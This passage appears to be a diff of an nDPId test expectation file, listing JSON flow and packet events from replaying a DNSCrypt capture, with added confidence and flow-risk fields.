AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":42570,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":946739305327,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAAIcwJBAAL0RNQkKAAABlXBwCuB5IPsCCMhQa\/4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305327,"flow_last_seen":946739305327,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":151,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305327,"pkt":"REREREREZmZmZmZmCABFAABQwJEAub0RdhsKAAABlXBwCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":151,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305328,"flow_last_seen":946739305328,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":946739305328,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305328,"pkt":"REREREREZmZmZmZmCABFAAIcwJJAAL0RNQcKAAABlXBwCti6IPsCCMhQa\/wBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305328,"flow_last_seen":946739305328,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305328,"flow_last_seen":946739305328,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305328,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":946739305329,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739305329,"pkt":"ZmZmZmZmRERERERECABFAADWg1EAADQR55WOBMxvCgAAAQG7qfEAwi9XAg+BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":946739305330,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739305330,"pkt":"ZmZmZmZmRERERERECABFAADWg08AADQR55eOBMxvCgAAAQG77iIAwusoAgyBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"}
 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":946739305331,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":946739305331,"pkt":"ZmZmZmZmRERERERECABFAADWg1IAADQR55SOBMxvCgAAAQG7twgAwiI\/AhCBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAG0rJMeHQmadAAjPo7oVfCGn+vVnYNn+3VnMSzQY0rAkl3fyY6FeDYzevPOP9Wx6CFjMcHM\/npT74\/JxSlg\/ZQ+xYYapuSWJmSy0bkM5eaAYWq1iOjOwzrlApye0OOzsPbFhhqm5JYmZWX62h1l+todsSrmH"}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":946739305348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":946739305348,"pkt":"ZmZmZmZmRERERERECABFAABHTCJAADsRLU2VcHAKCgAAASD7nEkAM5Mra\/2AAAABAAAAAAAAATINZG5zY3J5cHQtY2VydAVxdWFkOQNuZXQAABAAAQ=="}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305348,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":946739305348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305348,"pkt":"REREREREZmZmZmZmCABFAAIcCf9AAL0Rd68KAAABlTjkLZX0AbsCCDw8f0cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305348,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305348,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":38388,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305348,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":946739305348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305348,"pkt":"REREREREZmZmZmZmCABFAAXcCgAgAL0Rk+4KAAABlTjkLbKaAbsGBGxVf0QBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305348,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305348,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":159,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739305348,"pkt":"REREREREZmZmZmZmCABFAABQCgAAub0RuMEKAAABlTjkLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":159,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305348,"flow_last_seen":946739305348,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305348,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":946739305348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739305348,"pkt":"REREREREZmZmZmZmCABFAAXcCgEgAL0Rk+0KAAABlTjkLYqnAbsGBJRGf0YBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdARjYS0yAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA